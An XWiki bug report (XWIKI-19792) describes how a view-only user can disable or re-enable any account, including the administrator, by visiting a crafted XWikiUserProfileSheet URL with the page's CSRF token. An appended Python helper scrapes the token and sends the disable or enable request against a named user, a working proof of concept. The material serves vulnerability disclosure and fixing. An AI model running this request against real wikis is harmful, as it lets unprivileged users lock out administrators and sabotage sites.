XWiki Platform / XWIKI-19792

Users with view rights can enable and disable any user account


Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      1. Go to <server>/xwiki/bin/view/XWiki/XWikiUserProfileSheet?action=disable&userId=XWiki.Admin&csrf=<token> where <token> is the CSRF token (can be found in the data-xwiki-form-token attribute of the <html> element).
      2. Log in as the admin user.

      Expected result:
      In the first step, false is displayed, and in the second step, the admin user can be used normally.

      Actual result:
      In the first step, true is displayed and in the second step, the admin user gets the message "Your account has been disabled. Please contact the administrator if you think this is a mistake.".

      By replacing disable by enable in the first step, the account can be re-enabled. This has two consequences:

      1. The wiki can be sabotaged by disabling all users.
      2. Disabled users can easily re-enable themselves, at least on wikis that aren't private; I haven't checked if a logged-in user on a private wiki can also re-enable himself.

      It is not clear to me if the rights check should have been in the user profile or in the user script server, which is why I've added both components.
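      The request from step 1, as an added reproduction helper that is not part of this issue or of the XWiki code base. It extracts the CSRF token from the data-xwiki-form-token attribute of the <html> element, builds the XWikiUserProfileSheet URL with action=disable or action=enable, and interprets the response the way the report describes (a bare "true" when the state change was applied, "false" when it was refused). The sample page, the server URL, the use of Main/WebHome as the page the token is read from, and the assumption that the sheet renders nothing but the boolean are all constructed for the example.

```python
"""
Reproduction helper for the request described in XWIKI-19792.

Added example, not the issue's or the project's own code. The sample HTML,
the server URL and the response interpretation are assumptions.
"""
import re
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Constructed sample of the <html> element an XWiki page carries; the real
# element has many more attributes, only data-xwiki-form-token matters here.
SAMPLE_PAGE = (
    '<!DOCTYPE html>\n'
    '<html lang="en" data-xwiki-form-token="abc123token" data-xwiki-wiki="xwiki">\n'
    '<head><title>Main.WebHome</title></head><body>...</body></html>\n'
)


class _FormTokenParser(HTMLParser):
    """Collect the data-xwiki-form-token attribute of the first <html> tag."""

    def __init__(self):
        super().__init__()
        self.token = None

    def handle_starttag(self, tag, attrs):
        if tag == "html" and self.token is None:
            for name, value in attrs:
                if name == "data-xwiki-form-token":
                    self.token = value


def extract_form_token(html_text):
    """Return the CSRF token from the <html> element, or None if absent."""
    parser = _FormTokenParser()
    parser.feed(html_text)
    return parser.token


def build_toggle_url(server, action, user_id, token):
    """
    Build the URL from step 1 of the report. `action` is "disable" or "enable";
    `user_id` is a user document reference such as XWiki.Admin.
    """
    if action not in ("disable", "enable"):
        raise ValueError("action must be 'disable' or 'enable'")
    query = urllib.parse.urlencode(
        {"action": action, "userId": user_id, "csrf": token}
    )
    return f"{server.rstrip('/')}/xwiki/bin/view/XWiki/XWikiUserProfileSheet?{query}"


def interpret_response(body):
    """
    Map the response body to the report's observed outcome. Assumption: the
    sheet renders only "true" (state changed) or "false" (request refused);
    any other visible text, e.g. a full HTML page, is reported as None.
    """
    text = re.sub(r"<[^>]+>", "", body)
    text = " ".join(text.split()).lower()
    if text == "true":
        return True
    if text == "false":
        return False
    return None


def check_toggle(server, action, user_id, opener=None):
    """
    Read the CSRF token from the wiki home page, then issue the toggle request
    with the same (possibly anonymous) session. Network code, not run offline.
    Returns True if the account state changed, False if refused, None otherwise.
    """
    opener = opener or urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor()
    )
    # Assumption: Main/WebHome is viewable and carries the token attribute.
    with opener.open(f"{server.rstrip('/')}/xwiki/bin/view/Main/WebHome") as resp:
        token = extract_form_token(resp.read().decode("utf-8", "replace"))
    if token is None:
        raise RuntimeError("no data-xwiki-form-token on the page")
    with opener.open(build_toggle_url(server, action, user_id, token)) as resp:
        return interpret_response(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration against the constructed sample page.
    tok = extract_form_token(SAMPLE_PAGE)
    print(build_toggle_url("http://localhost:8080", "disable", "XWiki.Admin", tok))
```

      On a patched wiki the same request, sent with a view-only session, should yield False from interpret_response for any target user; True against an account the session does not own is the behaviour the report describes.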


          People

            surli Simon Urli
            MichaelHamann Michael Hamann
